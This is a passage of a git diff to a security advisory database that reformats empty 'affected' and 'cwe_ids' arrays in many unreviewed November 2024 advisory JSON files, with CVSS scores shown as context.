a/advisories/unreviewed/2024/11/GHSA-r9cc-7xcq-fpxg/GHSA-r9cc-7xcq-fpxg.json b/advisories/unreviewed/2024/11/GHSA-r9cc-7xcq-fpxg/GHSA-r9cc-7xcq-fpxg.json index 1a2a0de6078..ec86b90fd7c 100644 --- a/advisories/unreviewed/2024/11/GHSA-r9cc-7xcq-fpxg/GHSA-r9cc-7xcq-fpxg.json +++ b/advisories/unreviewed/2024/11/GHSA-r9cc-7xcq-fpxg/GHSA-r9cc-7xcq-fpxg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-rh3g-vww5-3jr6/GHSA-rh3g-vww5-3jr6.json b/advisories/unreviewed/2024/11/GHSA-rh3g-vww5-3jr6/GHSA-rh3g-vww5-3jr6.json index 85d9abf2947..99df263c8ca 100644 --- a/advisories/unreviewed/2024/11/GHSA-rh3g-vww5-3jr6/GHSA-rh3g-vww5-3jr6.json +++ b/advisories/unreviewed/2024/11/GHSA-rh3g-vww5-3jr6/GHSA-rh3g-vww5-3jr6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-rhhp-94ch-9rf5/GHSA-rhhp-94ch-9rf5.json b/advisories/unreviewed/2024/11/GHSA-rhhp-94ch-9rf5/GHSA-rhhp-94ch-9rf5.json index e1d184ee5af..4ac948fd961 100644 --- a/advisories/unreviewed/2024/11/GHSA-rhhp-94ch-9rf5/GHSA-rhhp-94ch-9rf5.json +++ b/advisories/unreviewed/2024/11/GHSA-rhhp-94ch-9rf5/GHSA-rhhp-94ch-9rf5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-rhwx-656q-5r7x/GHSA-rhwx-656q-5r7x.json b/advisories/unreviewed/2024/11/GHSA-rhwx-656q-5r7x/GHSA-rhwx-656q-5r7x.json index 2a6329c5e88..6e50a8e279a 100644 --- a/advisories/unreviewed/2024/11/GHSA-rhwx-656q-5r7x/GHSA-rhwx-656q-5r7x.json +++ b/advisories/unreviewed/2024/11/GHSA-rhwx-656q-5r7x/GHSA-rhwx-656q-5r7x.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-rpgw-8x6f-7c3f/GHSA-rpgw-8x6f-7c3f.json b/advisories/unreviewed/2024/11/GHSA-rpgw-8x6f-7c3f/GHSA-rpgw-8x6f-7c3f.json index 9498755ec93..6f9394418d1 100644 --- a/advisories/unreviewed/2024/11/GHSA-rpgw-8x6f-7c3f/GHSA-rpgw-8x6f-7c3f.json +++ b/advisories/unreviewed/2024/11/GHSA-rpgw-8x6f-7c3f/GHSA-rpgw-8x6f-7c3f.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-rrmf-46w6-f74r/GHSA-rrmf-46w6-f74r.json b/advisories/unreviewed/2024/11/GHSA-rrmf-46w6-f74r/GHSA-rrmf-46w6-f74r.json index 83ccb8a1301..13088df50a0 100644 --- a/advisories/unreviewed/2024/11/GHSA-rrmf-46w6-f74r/GHSA-rrmf-46w6-f74r.json +++ b/advisories/unreviewed/2024/11/GHSA-rrmf-46w6-f74r/GHSA-rrmf-46w6-f74r.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-rvw7-mvc2-hwvc/GHSA-rvw7-mvc2-hwvc.json b/advisories/unreviewed/2024/11/GHSA-rvw7-mvc2-hwvc/GHSA-rvw7-mvc2-hwvc.json index 99dd972cc63..ef9395a1285 100644 --- a/advisories/unreviewed/2024/11/GHSA-rvw7-mvc2-hwvc/GHSA-rvw7-mvc2-hwvc.json +++ b/advisories/unreviewed/2024/11/GHSA-rvw7-mvc2-hwvc/GHSA-rvw7-mvc2-hwvc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-v7xc-84pr-6g9h/GHSA-v7xc-84pr-6g9h.json b/advisories/unreviewed/2024/11/GHSA-v7xc-84pr-6g9h/GHSA-v7xc-84pr-6g9h.json index 03050ca5048..0960946eb8c 100644 --- a/advisories/unreviewed/2024/11/GHSA-v7xc-84pr-6g9h/GHSA-v7xc-84pr-6g9h.json +++ b/advisories/unreviewed/2024/11/GHSA-v7xc-84pr-6g9h/GHSA-v7xc-84pr-6g9h.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-vcp3-gcj3-f3h6/GHSA-vcp3-gcj3-f3h6.json b/advisories/unreviewed/2024/11/GHSA-vcp3-gcj3-f3h6/GHSA-vcp3-gcj3-f3h6.json index 3bc601233e9..3766d831115 100644 --- a/advisories/unreviewed/2024/11/GHSA-vcp3-gcj3-f3h6/GHSA-vcp3-gcj3-f3h6.json +++ b/advisories/unreviewed/2024/11/GHSA-vcp3-gcj3-f3h6/GHSA-vcp3-gcj3-f3h6.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:L/UI:P/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-vhw4-47fj-xp7j/GHSA-vhw4-47fj-xp7j.json b/advisories/unreviewed/2024/11/GHSA-vhw4-47fj-xp7j/GHSA-vhw4-47fj-xp7j.json index 7d001f6a18f..ac085b0b6f2 100644 --- a/advisories/unreviewed/2024/11/GHSA-vhw4-47fj-xp7j/GHSA-vhw4-47fj-xp7j.json +++ b/advisories/unreviewed/2024/11/GHSA-vhw4-47fj-xp7j/GHSA-vhw4-47fj-xp7j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-vp5v-7j7w-mjxh/GHSA-vp5v-7j7w-mjxh.json b/advisories/unreviewed/2024/11/GHSA-vp5v-7j7w-mjxh/GHSA-vp5v-7j7w-mjxh.json index 2e0c80c9f42..80ef89d6b43 100644 --- a/advisories/unreviewed/2024/11/GHSA-vp5v-7j7w-mjxh/GHSA-vp5v-7j7w-mjxh.json +++ b/advisories/unreviewed/2024/11/GHSA-vp5v-7j7w-mjxh/GHSA-vp5v-7j7w-mjxh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-vpvv-6p83-mmw2/GHSA-vpvv-6p83-mmw2.json b/advisories/unreviewed/2024/11/GHSA-vpvv-6p83-mmw2/GHSA-vpvv-6p83-mmw2.json index 1fc7a1f14fe..cf598ece82c 100644 --- a/advisories/unreviewed/2024/11/GHSA-vpvv-6p83-mmw2/GHSA-vpvv-6p83-mmw2.json +++ b/advisories/unreviewed/2024/11/GHSA-vpvv-6p83-mmw2/GHSA-vpvv-6p83-mmw2.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-vrg8-9w2w-pvxg/GHSA-vrg8-9w2w-pvxg.json b/advisories/unreviewed/2024/11/GHSA-vrg8-9w2w-pvxg/GHSA-vrg8-9w2w-pvxg.json index e40a51df1ca..25b69f31b50 100644 --- a/advisories/unreviewed/2024/11/GHSA-vrg8-9w2w-pvxg/GHSA-vrg8-9w2w-pvxg.json +++ b/advisories/unreviewed/2024/11/GHSA-vrg8-9w2w-pvxg/GHSA-vrg8-9w2w-pvxg.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-vrw9-92xm-fch7/GHSA-vrw9-92xm-fch7.json b/advisories/unreviewed/2024/11/GHSA-vrw9-92xm-fch7/GHSA-vrw9-92xm-fch7.json index 4d5795107db..b72c68888ad 100644 --- a/advisories/unreviewed/2024/11/GHSA-vrw9-92xm-fch7/GHSA-vrw9-92xm-fch7.json +++ b/advisories/unreviewed/2024/11/GHSA-vrw9-92xm-fch7/GHSA-vrw9-92xm-fch7.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-vw47-58pm-68j7/GHSA-vw47-58pm-68j7.json b/advisories/unreviewed/2024/11/GHSA-vw47-58pm-68j7/GHSA-vw47-58pm-68j7.json index c541ba71104..c8698dcfe42 100644 --- a/advisories/unreviewed/2024/11/GHSA-vw47-58pm-68j7/GHSA-vw47-58pm-68j7.json +++ b/advisories/unreviewed/2024/11/GHSA-vw47-58pm-68j7/GHSA-vw47-58pm-68j7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w26w-xhj2-cfxj/GHSA-w26w-xhj2-cfxj.json b/advisories/unreviewed/2024/11/GHSA-w26w-xhj2-cfxj/GHSA-w26w-xhj2-cfxj.json index 131429fce7f..c2fcce38764 100644 --- a/advisories/unreviewed/2024/11/GHSA-w26w-xhj2-cfxj/GHSA-w26w-xhj2-cfxj.json +++ b/advisories/unreviewed/2024/11/GHSA-w26w-xhj2-cfxj/GHSA-w26w-xhj2-cfxj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w2hm-jj7v-qvjx/GHSA-w2hm-jj7v-qvjx.json b/advisories/unreviewed/2024/11/GHSA-w2hm-jj7v-qvjx/GHSA-w2hm-jj7v-qvjx.json index f70fe24f86e..ebc0a0ee79b 100644 --- a/advisories/unreviewed/2024/11/GHSA-w2hm-jj7v-qvjx/GHSA-w2hm-jj7v-qvjx.json +++ b/advisories/unreviewed/2024/11/GHSA-w2hm-jj7v-qvjx/GHSA-w2hm-jj7v-qvjx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w33h-3r53-4xwj/GHSA-w33h-3r53-4xwj.json b/advisories/unreviewed/2024/11/GHSA-w33h-3r53-4xwj/GHSA-w33h-3r53-4xwj.json index 9113232107b..6e175725d78 100644 --- a/advisories/unreviewed/2024/11/GHSA-w33h-3r53-4xwj/GHSA-w33h-3r53-4xwj.json +++ b/advisories/unreviewed/2024/11/GHSA-w33h-3r53-4xwj/GHSA-w33h-3r53-4xwj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w73v-97q9-6vfp/GHSA-w73v-97q9-6vfp.json b/advisories/unreviewed/2024/11/GHSA-w73v-97q9-6vfp/GHSA-w73v-97q9-6vfp.json index 0c34be73a41..ba9e71d172d 100644 --- a/advisories/unreviewed/2024/11/GHSA-w73v-97q9-6vfp/GHSA-w73v-97q9-6vfp.json +++ b/advisories/unreviewed/2024/11/GHSA-w73v-97q9-6vfp/GHSA-w73v-97q9-6vfp.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w7cf-g3rh-q9hc/GHSA-w7cf-g3rh-q9hc.json b/advisories/unreviewed/2024/11/GHSA-w7cf-g3rh-q9hc/GHSA-w7cf-g3rh-q9hc.json index 7fba103dd2f..397f1318135 100644 --- a/advisories/unreviewed/2024/11/GHSA-w7cf-g3rh-q9hc/GHSA-w7cf-g3rh-q9hc.json +++ b/advisories/unreviewed/2024/11/GHSA-w7cf-g3rh-q9hc/GHSA-w7cf-g3rh-q9hc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w7v8-fcm4-p35g/GHSA-w7v8-fcm4-p35g.json b/advisories/unreviewed/2024/11/GHSA-w7v8-fcm4-p35g/GHSA-w7v8-fcm4-p35g.json index a5c3a645bbc..5a320900284 100644 --- a/advisories/unreviewed/2024/11/GHSA-w7v8-fcm4-p35g/GHSA-w7v8-fcm4-p35g.json +++ b/advisories/unreviewed/2024/11/GHSA-w7v8-fcm4-p35g/GHSA-w7v8-fcm4-p35g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w8mp-53m7-xcpv/GHSA-w8mp-53m7-xcpv.json b/advisories/unreviewed/2024/11/GHSA-w8mp-53m7-xcpv/GHSA-w8mp-53m7-xcpv.json index 1e6be7e6766..c16b0be8803 100644 --- a/advisories/unreviewed/2024/11/GHSA-w8mp-53m7-xcpv/GHSA-w8mp-53m7-xcpv.json +++ b/advisories/unreviewed/2024/11/GHSA-w8mp-53m7-xcpv/GHSA-w8mp-53m7-xcpv.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w962-c32f-386m/GHSA-w962-c32f-386m.json b/advisories/unreviewed/2024/11/GHSA-w962-c32f-386m/GHSA-w962-c32f-386m.json index bc30a7527a6..b604ff6cc85 100644 --- a/advisories/unreviewed/2024/11/GHSA-w962-c32f-386m/GHSA-w962-c32f-386m.json +++ b/advisories/unreviewed/2024/11/GHSA-w962-c32f-386m/GHSA-w962-c32f-386m.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w9j2-h8vr-446x/GHSA-w9j2-h8vr-446x.json b/advisories/unreviewed/2024/11/GHSA-w9j2-h8vr-446x/GHSA-w9j2-h8vr-446x.json index 9aa5208f574..b71ad4765d9 100644 --- a/advisories/unreviewed/2024/11/GHSA-w9j2-h8vr-446x/GHSA-w9j2-h8vr-446x.json +++ b/advisories/unreviewed/2024/11/GHSA-w9j2-h8vr-446x/GHSA-w9j2-h8vr-446x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-w9xp-hq72-9j37/GHSA-w9xp-hq72-9j37.json b/advisories/unreviewed/2024/11/GHSA-w9xp-hq72-9j37/GHSA-w9xp-hq72-9j37.json index 9a7442d3c30..3d9ee213e3c 100644 --- a/advisories/unreviewed/2024/11/GHSA-w9xp-hq72-9j37/GHSA-w9xp-hq72-9j37.json +++ b/advisories/unreviewed/2024/11/GHSA-w9xp-hq72-9j37/GHSA-w9xp-hq72-9j37.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wg5x-j7p6-x5pc/GHSA-wg5x-j7p6-x5pc.json b/advisories/unreviewed/2024/11/GHSA-wg5x-j7p6-x5pc/GHSA-wg5x-j7p6-x5pc.json index fce9e553aea..b6cafa0d928 100644 --- a/advisories/unreviewed/2024/11/GHSA-wg5x-j7p6-x5pc/GHSA-wg5x-j7p6-x5pc.json +++ b/advisories/unreviewed/2024/11/GHSA-wg5x-j7p6-x5pc/GHSA-wg5x-j7p6-x5pc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wjcx-j69p-3c64/GHSA-wjcx-j69p-3c64.json b/advisories/unreviewed/2024/11/GHSA-wjcx-j69p-3c64/GHSA-wjcx-j69p-3c64.json index b95775a5449..67160d10d83 100644 --- a/advisories/unreviewed/2024/11/GHSA-wjcx-j69p-3c64/GHSA-wjcx-j69p-3c64.json +++ b/advisories/unreviewed/2024/11/GHSA-wjcx-j69p-3c64/GHSA-wjcx-j69p-3c64.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-wpcc-2qm5-qrcg/GHSA-wpcc-2qm5-qrcg.json b/advisories/unreviewed/2024/11/GHSA-wpcc-2qm5-qrcg/GHSA-wpcc-2qm5-qrcg.json index 7009eee313c..52610fae34a 100644 --- a/advisories/unreviewed/2024/11/GHSA-wpcc-2qm5-qrcg/GHSA-wpcc-2qm5-qrcg.json +++ b/advisories/unreviewed/2024/11/GHSA-wpcc-2qm5-qrcg/GHSA-wpcc-2qm5-qrcg.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wpwf-qxpx-v6qh/GHSA-wpwf-qxpx-v6qh.json b/advisories/unreviewed/2024/11/GHSA-wpwf-qxpx-v6qh/GHSA-wpwf-qxpx-v6qh.json index e85d0de37be..116686a936e 100644 --- a/advisories/unreviewed/2024/11/GHSA-wpwf-qxpx-v6qh/GHSA-wpwf-qxpx-v6qh.json +++ b/advisories/unreviewed/2024/11/GHSA-wpwf-qxpx-v6qh/GHSA-wpwf-qxpx-v6qh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wq79-mjg7-48hq/GHSA-wq79-mjg7-48hq.json b/advisories/unreviewed/2024/11/GHSA-wq79-mjg7-48hq/GHSA-wq79-mjg7-48hq.json index bf9dfcaf2d1..f94de2e3d38 100644 --- a/advisories/unreviewed/2024/11/GHSA-wq79-mjg7-48hq/GHSA-wq79-mjg7-48hq.json +++ b/advisories/unreviewed/2024/11/GHSA-wq79-mjg7-48hq/GHSA-wq79-mjg7-48hq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wr5g-3v8j-6j7j/GHSA-wr5g-3v8j-6j7j.json b/advisories/unreviewed/2024/11/GHSA-wr5g-3v8j-6j7j/GHSA-wr5g-3v8j-6j7j.json index 5bd6c665fd5..96bac7808a3 100644 --- a/advisories/unreviewed/2024/11/GHSA-wr5g-3v8j-6j7j/GHSA-wr5g-3v8j-6j7j.json +++ b/advisories/unreviewed/2024/11/GHSA-wr5g-3v8j-6j7j/GHSA-wr5g-3v8j-6j7j.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wv8j-c43j-422r/GHSA-wv8j-c43j-422r.json b/advisories/unreviewed/2024/11/GHSA-wv8j-c43j-422r/GHSA-wv8j-c43j-422r.json index f45fb1e4ce7..a958306ad3f 100644 --- a/advisories/unreviewed/2024/11/GHSA-wv8j-c43j-422r/GHSA-wv8j-c43j-422r.json +++ b/advisories/unreviewed/2024/11/GHSA-wv8j-c43j-422r/GHSA-wv8j-c43j-422r.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wv8w-2qgf-xxfj/GHSA-wv8w-2qgf-xxfj.json b/advisories/unreviewed/2024/11/GHSA-wv8w-2qgf-xxfj/GHSA-wv8w-2qgf-xxfj.json index 59dd54eb19d..5aee9134476 100644 --- a/advisories/unreviewed/2024/11/GHSA-wv8w-2qgf-xxfj/GHSA-wv8w-2qgf-xxfj.json +++ b/advisories/unreviewed/2024/11/GHSA-wv8w-2qgf-xxfj/GHSA-wv8w-2qgf-xxfj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/11/GHSA-wvr7-6c53-gjjg/GHSA-wvr7-6c53-gjjg.json b/advisories/unreviewed/2024/11/GHSA-wvr7-6c53-gjjg/GHSA-wvr7-6c53-gjjg.json index c1eb0cb03e9..78bd2021ee2 100644 --- a/advisories/unreviewed/2024/11/GHSA-wvr7-6c53-gjjg/GHSA-wvr7-6c53-gjjg.json +++ b/advisories/unreviewed/2024/11/GHSA-wvr7-6c53-gjjg/GHSA-wvr7-6c53-gjjg.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/11/GHSA-ww66-45gm-65fm/GHSA-ww66-45gm-65fm.json b/advisories/unreviewed/2024/11/GHSA-ww66-45gm-65fm/GHSA-ww66-45gm-65fm.json index f7a7fa8fe21..db075bd44a2 100644 --- a/advisories/unreviewed/2024/11/GHSA-ww66-45gm-65fm/GHSA-ww66-45gm-65fm.json +++ b/advisories/unreviewed/2024/11/GHSA-ww66-45gm-65fm/GHSA-ww66-45gm-65fm.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 